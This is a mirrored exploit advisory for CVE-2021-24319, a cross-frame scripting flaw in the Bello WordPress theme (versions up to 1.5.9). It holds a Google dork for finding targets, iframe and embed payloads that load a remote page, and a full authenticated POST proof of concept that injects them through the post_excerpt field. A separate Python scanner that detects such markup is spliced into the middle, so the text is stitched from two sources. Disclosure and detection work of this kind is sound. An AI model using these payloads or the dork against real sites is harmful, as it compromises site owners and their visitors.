Bello WordPress Theme <= 1.5.9 - Authenticated XFS

| CVE | Category | Price | Severity |
|---|---|---|---|
| CVE-2021-24319 | CWE-1021 | $500 | High |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Unknown | High | Authenticated | 2021-05-17 |
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050094

Below is a copy:

Bello WordPress Theme <= 1.5.9 - Authenticated XFS
/*!
- # VULNERABILITY: Bello WordPress Theme <= 1.5.9 - Authenticated XFS
- # GOOGLE DORK: inurl:/wp-content/themes/bello/
- # DATE: 2021-03-21
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: BoldThemes [ https://bold-themes.com ]
- # SOFTWARE VERSION: <= 1.5.9
- # SOFTWARE LINK: https://themeforest.net/item/bello-directory-listing-wordpress-theme/21815903
- # CVSS: AV:N/AC:L/PR:L/UI:R/S:C
- # CWE: CWE-1021
- # CVE: CVE-2021-24319
*/



### -- [ Info: ]

[i] An Authenticated XFS vulnerability was discovered in the Bello theme through v1.5.9 for WordPress.

[i] Vulnerable parameter(s): &post_excerpt.

[i] Plugin(s) affected: Bello by BoldThemes [ https://bold-themes.com ].



### -- [ Impact: ]

[~] Malicious iframe injection, plus the ability to combine it with other attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] <!--><embed src=https://m0ze.ru/payload/xfsii.html>

[$] <!--><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>



### -- [ PoC | Authenticated XFS | My Listings: ]

[!] POST /main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115 HTTP/1.1
Host: bello.bold-themes.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------16118302073611242382926219402
Content-Length: 13779
Referer: https://bello.bold-themes.com/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
Cookie: [user cookies]

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="action"

ajax_submit
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_form_config"

5d63602a0e2f80c83196bc5ea6405fca
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_title"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_content"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_excerpt"

</textarea><!-->"><!--><embed src=https://m0ze.ru/payload/xfsii.html>
<iframe src=https://m0ze.ru/payload/xfsii.html></iframe>
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="nonce_listing_cf"

e1c3b088fu
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_wp_http_referer"

/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-location_position"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-region"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_from"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_to"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_free"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_address"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_phone"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_mobile"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_email"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_website"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_price"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_description"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_facebook"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_twitter"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_instagram"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_google_plus"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_pinterest"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_tripadvisor"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_youtube"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-faq"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_free_wifi"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_air_conditioned"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_featured"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_exterior"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_interior"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_pools"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_beach"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_spa"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_sound"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_1"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_2"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_3"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_1"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[0]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[1]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[3]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[4]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[5]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-bello-listing-package"

bello-default-package
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_form_email"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_restaurant"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_non_smoking_rooms"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

49
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_submit"

1
-----------------------------16118302073611242382926219402--
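
A defender-side check for the request shape shown above, added here as an example and not part of the advisory: it parses the multipart body, restricts itself to `action=ajax_submit` listing submissions, and flags any field carrying the frame/embed markup or the textarea/comment breakout sequences listed under Payloads. The boundary, field values and payload host are constructed stand-ins.

```python
import re

# Markup a listing form's plain-text fields should never carry. "</textarea" and
# "<!--" are the breakout sequences the advisory's payload uses to escape the
# edit form's markup before the <embed>/<iframe> lands in the page.
SUSPECT = re.compile(r"</?\s*(iframe|embed|object|frame|textarea)\b|<!--", re.I)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Split a multipart/form-data body into {field_name: value} for text parts."""
    fields = {}
    delim = b"--" + boundary.encode()          # body lines carry "--" + header boundary
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):             # closing "--boundary--" delimiter
            break
        head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n").decode(errors="replace")
    return fields


def find_frame_injection(fields: dict) -> list:
    """Return (field, token) for every field carrying frame/embed/breakout markup."""
    return [(name, m.group(0)) for name, value in fields.items()
            for m in SUSPECT.finditer(value)]


def scan_request(body: bytes, boundary: str) -> list:
    """Flag only listing submissions (action=ajax_submit), as in the advisory's PoC."""
    fields = parse_multipart(body, boundary)
    if fields.get("action") != "ajax_submit":
        return []
    return find_frame_injection(fields)


# Constructed sample request body, modelled on the advisory (boundary shortened,
# payload host replaced by a placeholder).
BOUNDARY = "---------------------------1611830207"
SAMPLE = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="action"\r\n\r\najax_submit\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="post_title"\r\n\r\n13\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="post_excerpt"\r\n\r\n'
    '</textarea><!-->"><!--><embed src=https://example.invalid/x.html>\r\n'
    '<iframe src=https://example.invalid/x.html></iframe>\r\n'
    f'--{BOUNDARY}--\r\n'
).encode()

if __name__ == "__main__":
    for field, token in scan_request(SAMPLE, BOUNDARY):
        print(f"{field}: {token!r}")
```

The same scan can be pointed at stored `post_excerpt` values to find listings that were already poisoned before a fix was applied.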



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
